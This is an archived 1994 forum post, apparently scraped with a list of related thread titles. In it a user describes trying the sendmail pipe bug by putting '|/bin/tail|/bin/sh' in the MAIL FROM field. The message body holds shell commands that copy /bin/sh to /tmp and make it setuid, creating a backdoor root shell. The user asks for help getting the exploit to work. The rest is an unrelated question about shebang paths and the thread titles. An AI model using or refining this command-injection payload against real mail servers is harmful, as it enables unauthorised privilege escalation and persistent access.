Q: Sendmail Bug using From: |/bin/tail|/bin/sh

Q: Sendmail Bug using From: |/bin/tail|/bin/sh

Post by EQR8KHOK.. » Thu, 17 Nov 1994 03:53:18

We have sendmail 5.0 installed on System V Release 4.0.
I tried to exploit the sendmail bug but no luck. I tried :

mail from: |/bin/tail|/bin/sh
rcpt to: fred  (thats me)

Return-Receipt-To: |fooooobar
Subject: Checking our mail for vulnerabilities


echo This is a test > /tmp/b1
echo id is: >> /tmp/b1
/bin/id >> /tmp/b1
echo *****KRAD****** >> /tmp/b1
cp /bin/sh /tmp/afil3
chmod u+s /tmp/afil3
echo /tmp/afil3 contains a krad file >> /tmp/b1
chmod ugo+rx /tmp/afil3

Now what happens is that I get the message returned to me with:

Message  2:
From |/bin/tail|/bin/sh Tue Nov 15 18:18 GMT 1994
Date: Tue, 15 Nov 1994 18:14:00 +0000

as the header... why have I got it back? I think the mail program should
have executed the program I put.. so why didn't it create the shell?
Any Input would be greatly apprectiated... e-mail your response if you know
how to get it working... thanks.


1. #!/bin/sh #!/usr/bin/sh can I do both for 2 diff machines

I'd like the same script to run on 2 different machines, Hp and Sun.
The problem is that sh resides in different directories.  Is there
a way to have exec look in two places?

P.S.  No, I don't have write access to /usr/bin, or /bin

Any help appreciated,

Office phone: 503-737-5583 (Batcheller 349);home: 503-757-8772
Office mail:  303 Dearborn Hall, OSU, Corvallis, OR  97331

2. Query on stream driver

3. more secure?: "#!/bin/sh -" or "#!/bin/sh"

4. termcap problems and rows/cols

5. /usr/bin, /usr/local/bin, /sbin or /opt/bin, /var/opt/bin - I'm confused.

6. Soundblaster 16 PCI with Mandrake 7.1

7. executing /bin/sh script in a /bin/csh login

8. Pentium Native Linux

9. % /bin/sh -c /bin/ls -l -R ???

10. re : /bin/sh:/bin/tar:0403-027:parameter list is too long

11. /bin/sh:/bin/tar:0403-027:parameter list is too long

12. /bin/sh, /bin/ksh crash with SIGSEGV with a huge script

13. /bin/sh -> /usr/local/bin/bash won't boot